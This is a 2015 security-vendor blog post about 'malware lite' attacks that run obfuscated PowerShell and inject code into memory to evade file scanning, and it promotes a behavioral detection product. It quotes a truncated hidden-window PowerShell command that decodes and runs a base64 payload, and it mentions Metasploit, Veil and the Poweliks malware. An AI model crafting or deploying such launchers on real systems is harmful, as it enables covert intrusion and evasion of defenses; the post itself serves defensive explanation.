(Editor’s Note: On July 19, 2016 Carbon Black announced its acquisition of Confer. The enclosed blog was originally posted on Confer’s website on September 19, 2015.)
Bacteria are famously diverse and adaptive, and nothing better exemplifies their resilience than today’s “super bugs,” which have developed resistance to even the most powerful antibiotics.
I’m often struck by the parallels between these tiny organisms and today’s IT security threats. What microbiologist Anne Maczulak has written about bacteria could easily be said about advanced, persistent attacks: “Evolution has eliminated all extraneous structures. Also, a small, simple architecture allows for rapid reproduction, which aids adaptation.”
“Look Mom! [Almost] no malware.”
In the ever-evolving battle between attackers and security defenders, much is being discussed these days about attacks that rely on little or no traditional malware artifacts written to disk. In general, these so-called “malwareless” attacks work by exploiting a running process—such as a web browser, plugin, document reader or server process—and typically involve pulling down additional stages of the attack, which are then loaded directly into memory. Malwareless attacks can also involve using common, whitelisted OS tools for the initial compromise, privilege escalation, and/or lateral movement. Predictably but ominously, the deployment of these attacks in the wild has moved into commodity exploit kits and ransomware campaigns.
Cb Defense researchers have been following a related category of attacks that I call “malware lite.” These typically involve exploitation of a trusted process via a command line, macro, or some other method to deliver the initial shellcode and creative persistence mechanisms, such as writing Powershell scripts to the registry to be called at some later time. There is malicious code, it just doesn’t live in a binary or script you can hash or scan.
The benefits of these methods are clear. Avoiding the need to write binaries directly to disk leaves far fewer opportunities for detection, thereby frustrating incident response. Binary whitelisting and signature-based scanning controls can be avoided altogether if you never write anything scannable. Attackers commonly leverage tools like Powershell and WMI on Windows platforms—and other scripting languages such as Python on OSX—to easily launch attacks that don’t include malicious binaries.
Noting new under the sun
This behavior is not totally new. In 1996, the article “Smashing the Stack for Fun and Profit,” famously discussed binary and service exploitation, describing the technique of injecting shellcode directly into the exploited process and then leveraging whitelisted tools do the rest of the dirty work. Persistence methods and backdoors involved setting up various combinations of preexisting and installed tools on compromised systems.
Over time, controls like network IDSs became more attuned to commodity exploits, shellcode, and C2. In response, the use of malware as an initial access and persistence vector was adopted to enhance attacker convenience and attack scaling. In turn, security organizations have focused on scanning network traffic and endpoints for known attacks and malicious binaries—defensive tactics that have made such attacks less effective.
Like resistant bacteria, attackers continue to evolve their methods, shifting back toward tools and techniques, such as powerful scripting and remote-control tools/languages, that turn the IT environment against us in ways that were rare just a few years ago.
This is a game changer
The fact that these techniques have been commoditized and are now widely used, even by run-of-the-mill cybercriminals, is totally new and a game-changer for enterprise security. While these concepts existed 20 years ago, the likelihood today is that a mid-market IT specialist is far more likely to see attacks of this sort on a regular basis than his or her predecessors were in 1996.
Demonstrating the prevalence and mechanisms of attacks, and the need for additional controls beyond traditional endpoint security, has never been easier for the Red Team. For example, by using the Veil framework and Metasploit in the lab, pentesters can craft a command line that leverages Powershell (or a number of other languages and techniques) to launch a hostile command and control channel with just a few menu selections.
Metasploit’s meterpreter also can be deployed via reflexive injection into an already running or started process to avoid the DLL ever being dropped onto the disk. On platforms such as OSX or Linux, similar backdoors can be deployed via command lines or scripting languages such as Python.
Combining these techniques gives the pentester a command-line string that can be placed in a batch file or run key, or deployed in any creative, single-command execution scenario similar to this one:
C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command “Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\”nVRtb9tGDP7uX0EIN0BCLEV+WZZYCF…
A command string like this—which here is invoking Powershell— will go undetected by most traditional endpoint solutions focused on scanning binaries or scripts. In contrast, Cb Defense detects the command string by monitoring the behaviors of allprocesses on the system, including whitelisted processes, without being reliant on having an executable to scan.
In the screenshot below, which was generated by Cb Defense, we see that Powershell tried to inject code into a Windows Explorer process, but the operation was blocked. Details about the attempt, including the command line itself, are captured in the shaded blue box.
The ability to monitor the behavior of all processes on the system, including those that prove to be malicious, is invaluable from an incident response perspective. This capability is the most significant factor that differentiates Cb Defense from traditional tools that scan for malware.
Out of the lab and into the wild
The techniques described above are not limited to pentester activities in the lab. The Cb Defense team has seen very similar obfuscation and persistence techniques in the wild. For example the Poweliks family (sample hash: 4727b7ea70d0fc00f96a28de7fa3d97fa9d0b253bd63ae54fbbf0bd0c8b766bb) is commonly known to execute Powershell via a registry run key and stored Powershell script.
From Russia, with love
This script then successfully injected code into the dllhost.exe process which, in turn, reached out for the malware command and control center in St. Petersburg, Russia, as shown below in Cb Defense screen captures.
“Malwareless” vs. “Malware Lite”
Contrary to labeling this activity as “malwareless,” it should be categorized as “malware lite.” True, there is no malware file on the device to scan and no malicious DLL being loaded. And the dropper is long gone or non-existent. But there ismalicious code present: It just can’t be found or removed by traditional file system scanning methods.
The upsurge of attacks that make use of malicious command lines or payloads to drive otherwise trusted executable behavior in malicious ways is an adaptation to actions we have taken collectively as defenders and system administrators. Going forward, the Cb Defense team believes that having visibility into the complete chain of events driven by such attacks is key to unraveling malicious behavior.